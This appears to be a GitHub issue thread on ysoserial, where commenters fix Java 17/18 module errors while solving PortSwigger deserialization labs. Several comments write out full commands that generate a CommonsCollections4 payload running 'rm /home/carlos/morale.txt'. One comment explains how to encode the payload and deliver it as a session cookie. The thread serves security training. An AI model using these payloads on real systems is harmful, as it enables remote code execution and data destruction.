Comments (11)
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call.
On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
[payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
[List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
from ysoserial.
THIS IS THE SOLUTION FOR LINUX:
This solution worked for me. Im making a (Portswigger lab) and i need this software works. Here you can find step by step how i fixed it.
- Install java 11
sudo apt-get install openjdk-11-jdk
- Add Java 11 to PATH variable. To add the Java 11 installation directory to the PATH variable, you can open the .bashrc or .bash_profile file in your home directory using a text editor. For example, you can use the following command to open the .bashrc file:
nano ~/.bashrc
- In the open file, add the following line to the end:
export PATH="/usr/lib/jvm/java-11-openjdk-amd64/bin:$PATH"
- Save and exit nano
- Restart the terminal with the following command
source ~/.bashrc
- Execute ysoserial. Example:
java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
- You should see the following output on the first line:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Alternative and easy way:
sudo apt update -y
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version
from ysoserial.
BTW , whoever still struggling with that particular lab or ysoserial , I recommend using Java 8. Here is how it worked for me (Linux):
- Download Java 8 from here https://jdk.java.net/java-se-ri/8-MR5
tar xvf openjdk-bla-bla-bla.tar.gz
/home/user/Downloads/java-se-8u43-ri/bin/java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > cookie.txt
- remove white spaces from cookie.txt file (use online tools , or you can do it manually)
- Pasted your cookie as wiener cookies
- Before sending request don't forget to URL encode all characters (with burp , choose the pasted cookie , right click , Convert selection>URL> URL encode all-characters)
- Send the request
Hope it helps ;)
from ysoserial.
Same issue with Java 18
$ java --version
openjdk 18.0.2 2022-07-19
OpenJDK Runtime Environment (build 18.0.2+10)
OpenJDK 64-Bit Server VM (build 18.0.2+10, mixed mode, sharing)
$ java -jar ysoserial.jar CommonsCollections1 calc.exe
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Constructor.checkCanSetAccessible(Constructor.java:191)
at java.base/java.lang.reflect.Constructor.setAccessible(Constructor.java:184)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:55)
at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
from ysoserial.
@Anawak , thanks bro, your solution worked for portswigger lab no 5, for java 17 version users:
...................................................
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
from ysoserial.
Ok but how can i run ysoserial.jar with another version of java?
When I run Ysoserial I got these's errors :
Error while generating or serializing payload
$ java -jar ysoserial.jar CommonsCollections4 'Payload' java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26) at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
I found out that's errors happen only with Java 17. I saw some people facing the same problem online. When run it again on java 15 it worked. More Info:
$ java --version openjdk 17.0.6 2023-01-17 OpenJDK Runtime Environment (build 17.0.6+10-Debian-1) OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
from ysoserial.
7. true
I'm also did it for port swigger lab I did it with java 15
from ysoserial.
For anyone still wanting to use Java 17, it is possible through the --add-opens
option in java
. See #176 for more details, with a script I made that does this automatically in a comment there
from ysoserial.
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED \ [payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Y SO SERIAL? Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]' Available payload types: [List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\ --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\ -jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
Worked like a charm for me! I used Kali Linux v2023.3 with Java v17.0.8 to solve PortSwigger's lab
Thanks for sharing, you've saved me hours of further research & testing.
from ysoserial.
Duplicate of #176
from ysoserial.
thanks bro, your solution worked for portswigger lab no 5, for java 17 version users:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt'|base64 >tee.txt
from ysoserial.
Related Issues (20)
- Troubleshooting docs
- i can't found ysoserial.jar ! HOT 2
- ysoserial doesn't work with Java 18 HOT 1
- another way to Get PoC with RCE HOT 1
- Help understanding the CommonsBeanutils1 payload HOT 1
- Error while generating or serializing payload(openjdk17) HOT 1
- Error: Unable to access jarfile ysoserial.jar HOT 6
- Error while generating or serializing payload (FIXED) HOT 2
- A tool for fuzzing the right payload HOT 3
- I don't know how to input next. HOT 2
- How can I create the sleep payload in the following payload with ysoserial? HOT 1
- Common Collection1 failed HOT 1
- Hello, I have some confusion about the code implementation of URLDNS HOT 2
- getting error while executing the command HOT 1
- ERROR when building → javax.interceptor depency no longer available at repo.jenkins-ci.org
- Ysoserial - System.IO.FileNotFoundException HOT 1
- parameter 'descriptor' has been removed from the plugin, please verify documentation.
- javax.interceptor-api/3.1 is no longer available HOT 1
- Build Failure HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysoserial.